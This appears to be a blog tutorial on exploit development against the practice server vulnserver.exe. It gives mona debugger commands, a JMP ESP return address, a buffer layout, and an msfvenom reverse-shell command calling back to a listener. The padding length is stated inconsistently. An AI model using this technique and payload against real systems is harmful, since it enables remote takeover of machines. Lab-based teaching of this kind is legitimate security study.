.png)
2 years ago
157 BOOK THIS SPACE FOR AD
ARTICLE ADHello Security folks, Tejas here :) I hope you all are doing great. In previous writeup, we reached at the point where we were able to overwrite the EIP with B’s (42424242). That concludes now we have total control of EIP and can go for further exploitation.
Note: Before generating shell code we need to figure out all the bad characters, doing this will prevent us getting errors in exploiting phase.
A bad character is simply a list of unwanted characters that can break the shell codes. When generating a shell code, we need to know what characters are bad or good for the shell code. To speed the process of finding bad characters for our exploit, we will use mona in Immunity Debugger.
We can set mona working directory using the following command in Immunity Debugger: !mona config -set workingfolder c:\mona
We can now generate bad character byte array using mona. Use the following command: !mona bytearray -cpb "\x00
This will give you all types of characters that are available in Hexadecimal code starting from \x01 to \xFF in the terminal. Some of the very common bad characters are:
00 for NULL0A for Line Feed n0D for Carriage Return rFF for Form Feed fSource: infosecinstitute
the byte array can be found in the mona working directory in a file named bytearray.txt
Now we can send the bad character array generated by mona to our vulnserver.exe server to get result. The bad character will be placed after the EIP is overwritten.
I have created Python scripts that will be used in this whole attacking phase. You can get them here.
When executing the script, In Immunity Debugger, right-click on the ESP and from the drop-down menu, select Follow in Dump. It will dump and display all hex characters that we sent with our python script.
From the screenshot above, we can see the content of ESP is 00F6F9C8.
Now we can use mona to check for any bad character for our exploit based on the byte array we sent with the python script. We can achieve that using the following mona command in Immunity Debugger
!mona compare -f c:\mona\bytearray.bin -a 00F6F9C8Mona will compare the byte array we generated to the dump of ESP. For vulnserver.exe, mona didn’t find any bad character for the shell code.
Here is the result: Comparing with memory at location : 0x00f6f9c8 (Stack) !!! Hooray, normal shellcode unmodified !!!
We are going to check for dll that is associated with vulnserver.exe and does not have memory protection settings. mona can help to find the right module Using the following command, we can list all the module in vulnserver.exe : !mona modules
As we can see in the screenshot above, almost all the dlls have memory protection but essfunc.dll does not have the memory protection, thus it is our right module. Next, we should find an opcode equivalent of a JMP ESP. opcode is nothing but conversion of Assembly code to Hexcode. In this case, we will convert JMP ESP to Hexcode using Metasploit module.
Now is the important part of exploitation. After we fill out entire buffer and reach at EIP, we will be looking for memory address of FFE4 in vulnserver. Now, why memory address? that will make sense in a minute.
As we found opcode for JMP ESP that is FFE4, we will writing it in a proper hexadecimal format \xff\xe4
JMP ESP is a jump command. We will be using this as a pointer, So the pointer is going to JUMP to our malicious shellcode.
Use the following command to find memory address using “find” command and module essfunc.dll as it does not have memory protection for vulnserver.
!mona find -s "\xff\xe4" -m essfunc.dll
As we can see, the the memory address with opcode FFE4 is 625011af. Now we need to be able to control the EIP. We can put a breakpoint on 625011af address in Immunity Debugger. We will overflow the buffer and place 625011af in EIP and see if our breakpoint will be hit. Now, we can modify our python script and add the return address in reverse order (“\xaf\x11\x50\x62”).
To add breakpoint on the memory address follow the further steps:
Click on the above mentioned icon and enter the memory address. After that select the memory address and click “F2” or right click > Breakpoint > Toggle.
Immunity Debugger hits directly our breakpoint after running the above script and pause the execution since we have a break point.
As we can see in the screenshot, we hit our breakpoint, means that we have full control over the EIP and can run any shell code to compromise our target machine.
At this stage of the exploit development process, it is time to generate the shell code. We will use the msfvenom to create a reverse shell payload. The syntax is followed:
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.6 LPORT=4455 EXITFUNC=thread -f c -b “\x00”
f defines format where we have mentioned C language.-b for bad character. “\x00” is bad char by default.
Select entire payload without semi-colon and paste it in a new variable in our python script.
Now we need to send our shell code in the following flow:
buffer = b"A" * 510 + b"\xaf\x11\x50\x62" + b"\x90" * 32 + shell_codeWe overflow the buffer with 2003 A’s, we reach EIP and overwrite it with memory address which point to ESP and add 32 NOPs and then our shellcode. NOP is short for No operation, they are used to keep the payload sizes consistent.
Finally step, we need to start a listener on 4455 port to capture our reverse shell.
Note: This time there’s no need of attaching vulnserver to Immunity Debugger.
Now we can run our final exploit script against vulnserver.
Yayy!!! As we execute the script, Our listener received the reverse shell connection. Now we have full control over the target machine.
Bengali (Bangladesh) · 
English (United States) ·